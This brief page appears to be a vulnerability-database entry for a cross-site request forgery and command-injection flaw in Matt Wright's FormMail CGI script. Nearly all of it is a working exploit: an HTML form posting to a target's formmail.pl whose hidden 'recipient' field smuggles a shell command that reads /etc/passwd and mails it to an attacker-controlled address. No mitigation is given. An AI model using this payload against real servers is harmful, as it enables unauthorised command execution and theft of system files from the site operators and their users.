|
Matt Wright FormMail Cross-Site Request Forgery Vulnerability
This exploit, taken from "The Most Comprehensive List of CGI & httpd Bugs" (see Credit) also exploits BugTraq ID 2079. <html><head><title>hack</title></head> <body><form method="post" action="http://remote.target.host/cgi-bin/formmail.pl"> <input type="hidden" name="recipient" value="me@mymail.host; cat /etc/passwd | mail me@mymail.host"> <input type="submit" name="submit" value="submit"> </form></body></html> |
|
|
Privacy Statement |